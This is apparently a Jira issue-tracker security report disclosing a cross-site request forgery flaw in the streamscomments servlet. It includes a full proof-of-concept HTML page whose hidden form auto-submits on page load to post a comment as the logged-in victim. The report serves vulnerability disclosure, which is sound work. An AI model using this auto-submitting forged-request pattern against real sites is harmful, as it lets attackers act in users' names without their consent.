Cross-Site Request Forgery

2011-05-30T19:04:38
ID ATLASSIAN:JRASERVER-24716
Type atlassian
Reporter jpcbl
Modified 2017-02-17T06:20:02

Description

Cross-Site Request Forgery

Security auditing tests performed on a Jira Bug Issue and Project Tracking Software locally running instance shown that the application is succeptible to Cross-Site Request Forgery attacks within this URL:

[/jira/plugins/servlet/streamscomments]

This vulnerability enables for an attacker to post comments inside an issue through a session created by a valid user logged into the system. Comments are signed by the logged user and can be posted without it's consent.

The first image outlined below describes where the attack has been performed, the second image describes an example of the code used to trigger the Cross-Site Request Forgery and the third image describes the result of the attack:

!fontCode.png!

!pontoCsrfJira.png!

!xx_resultadoCSRF.png!

Furthermore, an example of the complete source-code of the Cross-Site Request Forgery html file can be found below:

{noformat} <html> <head> <TITLE>..:: TEMPEST XSRF ::..</TITLE> <body onload="document.formXSRF.submit()">

<center> .:: TEMPEST ::. <br> <br> <img src="data:image/jpge;base64,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" /> </center>

<div style="display:none"> <iframe name="framePost" > </iframe> </div>

<form name="formXSRF" action="http://jiradomain/jira/plugins/servlet/streamscomments" method="post" target="framePost"> <input type='hidden' name='replyTo' value='http://jiradomain/jira/plugins/servlet/streamscomments/TEMPEST-8415'> <input type='hidden' name='comment' value='Teste de CSRF por Ederson'> </form>

</body> </html>
{noformat}